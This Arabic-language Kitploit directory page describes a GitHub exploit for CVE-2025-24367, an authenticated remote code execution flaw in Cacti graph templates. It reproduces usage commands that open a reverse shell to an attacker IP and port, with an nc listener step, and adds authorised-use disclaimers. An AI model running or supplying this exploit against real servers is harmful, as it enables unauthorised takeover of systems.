Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24367 — استغلال تنفيذ التعليمات البرمجية عن بُعد المصادق عليه لثغرة قالب الرسم البياني في Cacti، مع حمولة صدفة عكسية ودعم وكيل لاختبار الاختراق المصرح به. | Kitploit
أدوات/GitHubGitHub/shoshinmaster/cve-2025-24367
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubshoshinmaster/cve-2025-24367

CVE-2025-24367

استغلال تنفيذ التعليمات البرمجية عن بُعد المصادق عليه لثغرة قالب الرسم البياني في Cacti، مع حمولة صدفة عكسية ودعم وكيل لاختبار الاختراق المصرح به.

عرض المستودع
12منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24367 - ثغرة RCE في قوالب رسوم Cacti الموثقة

الاستخدام والسلامة

هام — اقرأ هذا أولاً:
هذا المستودع وملف exploit.py مُقدَّم لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الكود ضد أنظمة أو شبكات أو خدمات ليس لديك تصريح صريح كتابي لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. باستخدام هذا الكود، فإنك توافق على اتباع القوانين المعمول بها والسياسات المؤسسية.


المتطلبات

  • Python 3.8+
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

الاستخدام

root@kitploit:~
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]

مثال

قبل تشغيل السكربت، تأكد من تشغيل مستمع nc. قم بتشغيل السكربت بدون بروكسي إلا في حالة التصحيح:

root@kitploit:~
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost

تحذيرات مهمة جداً

  • لا تقم بتشغيل هذا ضد أنظمة إنتاجية أو أي نظام لا تملكه أو ليس لديك إذن صريح باختباره.
  • احصل دائمًا على تصريح كتابي قبل إجراء اختبارات أمنية.
  • استخدم بيئات مختبرية معزولة (مثل الأجهزة الافتراضية أو الحاويات أو شبكات الاختبار المخصصة) للتجربة.
  • قد يكون لدى مؤسستك سياسات للإبلاغ والإفصاح — التزم بها.
  • لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام هذا الكود.

تذكير أخير: هذا السكربت وملف README مخصصان للاستخدام التعليمي فقط. لا تستخدم هذه الأدوات أبدًا للوصول غير القانوني إلى الأنظمة.

تنزيل الأداة